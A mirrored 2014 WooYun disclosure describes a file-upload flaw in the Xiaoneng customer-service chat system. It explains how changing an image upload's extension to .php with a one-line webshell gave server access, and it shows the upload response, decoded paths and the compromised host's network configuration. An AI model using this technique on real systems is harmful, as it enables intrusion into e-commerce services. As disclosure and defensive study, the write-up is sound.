小能在线客服系统可聊天可getshell(多家电商使用)

admin 2015年5月27日11:36:36评论793 views字数 254阅读0分50秒阅读模式
摘要

2014-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-10-05: 厂商已经主动忽略漏洞,细节向公众公开

漏洞概要 关注数(12) 关注此漏洞

缺陷编号: WooYun-2014-73315

漏洞标题: 小能在线客服系统可聊天可getshell(多家电商使用)

相关厂商: 小能

漏洞作者: loli小能在线客服系统可聊天可getshell(多家电商使用)

提交时间: 2014-08-21 14:33

公开时间: 2014-10-05 14:34

漏洞类型: 文件上传导致任意代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 未联系到厂商或者厂商积极忽略

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: webshell 文件上传内容未检查 webshell webshell

2人收藏


漏洞详情

披露状态:

2014-08-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-10-05: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

客服MM一定要警惕那些不说话给你发图片或文件的银。

详细说明:

code 区域
小能创立于2007年底,由来自微软、盛大等知名IT公司的高管创办,并先后为超过15000多家中国的互联网和电商公司提供产品和服务。2013年底,公司获得国际知名风险投资公司的投资。

---------------------------------------------------------------------------

code 区域
1.任意文件上传漏洞,可GETSHELL

在某网站上瞎逛看到有个客服在线,客服系统一般都提供发图片或者截图的功能,试了下韩都衣舍,看图:

小能在线客服系统可聊天可getshell(多家电商使用)

随便传了个图片过去,返回请求包如下:

code 区域
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Thu, 21 Aug 2014 05:24:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.10
Content-Length: 437

{"type":2,"msg":"传输完成","url":"http://t2d.ntalker.com/func/imagetrans/image.php?f=YWFhLnBuZw==&q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw==","oldfile":"aaa.png","size":"4.36 KB","extension":"png","sourceurl":"http://t2d.ntalker.com/func/imagetrans/download.php?f=YWFhLnBuZw==&q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw=="}
code 区域
URL被base64编码了:
f=YWFhLnBuZw== //这是上传的文件名
q=L2ltYWdlc2F2ZS90ZW1wL2tmXzk4MTcvZWI5ZmNhZmNlMmYxOTNlNzM2YzBmNjBmMjk1YjgzODAxNDA4NTk4Njc2LnBuZw== //上传的路径

通过burpsuite将png图片后缀直接改成php,插入php一句话马后上传,获取到shell:

小能在线客服系统可聊天可getshell(多家电商使用)

漏洞证明:

内网。。。

code 区域
[/home/www/t2d.ntalker.com/func/imagetrans/imagesave/temp/kf_1x/]$ /sbin/ifconfig
em1 Link encap:Ethernet HWaddr 00:26:B9:5C:A5:1A
inet addr:113.31.17.239 Bcast:113.31.17.255 Mask:255.255.255.224
inet6 addr: fe80::226:b9ff:fe5c:a51a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3766950309 errors:0 dropped:1 overruns:0 frame:0
TX packets:3438306797 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:564554700096 (525.7 GiB) TX bytes:1622506233974 (1.4 TiB)

em2 Link encap:Ethernet HWaddr 00:26:B9:5C:A5:1B
inet addr:192.168.1.190 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::226:b9ff:fe5c:a51b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:373313383 errors:0 dropped:0 overruns:0 frame:0
TX packets:314958152 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:273620519884 (254.8 GiB) TX bytes:159373614381 (148.4 GiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2799149950 errors:0 dropped:0 overruns:0 frame:0
TX packets:2799149950 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1016538441687 (946.7 GiB) TX bytes:1016538441687 (946.7 GiB)

更多小伙伴看这:

http://www.xiaoneng.cn/partner.html

修复方案:

判断文件后缀名,设置图片目录不执行脚本权限。

版权声明:转载请注明来源 loli@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-10-08 08:40 | 铁汉 ( 路人 | Rank:12 漏洞数:6 | 向各种大神学习之)

    1

    我终于知道,为神马很多客服系统都不给截图了

  2. 2014-10-08 10:02 | pandas ( 普通白帽子 | Rank:730 漏洞数:84 | 国家特级保护动物)

    0

    试了下,拿到的shell貌似还是xiaoneng的一个空间,和所在企业没啥联系?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin